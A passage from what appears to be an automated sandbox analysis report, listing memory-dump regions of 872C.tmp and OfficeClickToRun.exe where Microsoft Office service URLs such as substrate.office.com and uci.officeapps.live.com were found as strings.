    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/recommendedDocumentsy
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/searchhistory
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v2/init
    Source: 872C.tmp, 00000003.00000003.1393977781.0000000005561000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v2/initMBI_SSL
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/sharingsuggestion3
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/todob2/api/v1ed1-
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394034884.0000000005621000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015929363.00000248C3202000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015530791.00000248C31EA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2060962016.00000248C320D000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2055051473.00000248C3209000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2040649536.00000248C3209000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://syncservice.o365syncservice.com/
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFiles
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFilet
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://teams.cloud.microsoft/ups/global/authza
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://teams.cloud.microsoft/ups/global/eane-250
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tellmeservice.osi.office.net/tellmeservice/api/suggestionsons
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013075406.00000248C2C06000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2047270961.00000248C2C5B000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1949642856.00000248C2BFF000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015326352.00000248C2C4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tellmeservice.osi.office.netst
    Source: 872C.tmp, 00000003.00000003.1393845975.0000000005614000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393946065.0000000005614000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://templates.office.com/Search/results?ocid=oo_toc_client_app_MARVEL_UPS_templates_gopremiumLan
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394034884.0000000005621000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://templates.office.com/templates-for-excel?ocid=oo_toc_client_app_MARVEL_UPS_templates_gopremi
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394034884.0000000005621000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://templates.office.com/templates-for-word?ocid=oo_toc_client_app_MARVEL_UPS_templates_gopremiu
    Source: 872C.tmp, 00000003.00000003.1390200613.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015929363.00000248C3202000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015530791.00000248C31EA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2060962016.00000248C320D000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2055051473.00000248C3209000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2040649536.00000248C3209000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/ity
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/nding
    Source: 872C.tmp, 00000003.00000003.1393216623.0000000003CCF000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392280337.0000000003CCF000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430994473.0000000003CCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/Insights/v2
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.htmla
    Source: 872C.tmp, 00000003.00000003.1393977781.0000000005561000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.htmleInsightsImmersivehttp
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.htmliq
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2052051790.00000248C2CEB000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2059428637.00000248C2CEF000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1949642856.00000248C2BFF000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015929363.00000248C3202000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015530791.00000248C31EA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2060962016.00000248C320D000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2055051473.00000248C3209000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2040649536.00000248C3209000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://useraudit.o365auditrealtimeingestion.manage.office.com
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://useraudit.o365auditrealtimeingestion.manage.office.comX
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://useraudit.o365auditrealtimeingestion.manage.office.comn
    Source: 872C.tmp, 00000003.00000003.1393216623.0000000003CCF000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392280337.0000000003CCF000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430994473.0000000003CCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voice.officeapps.live.com/CustomEndpointHandler.ashxU
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voice.officeapps.live.com/coachrealtime.aspxA-41F5A7235243
    Source: 872C.tmp, 00000003.00000003.1390200613.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388611638.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015854306.00000248C318B000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: 872C.tmp, 00000003.00000003.1393977781.0000000005561000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678240491.00000248C314B000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1677812892.00000248C3123000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/ExchangeAutoDiscoverhttps:/
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/e.Sha
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/sonve6HE
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394034884.0000000005621000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 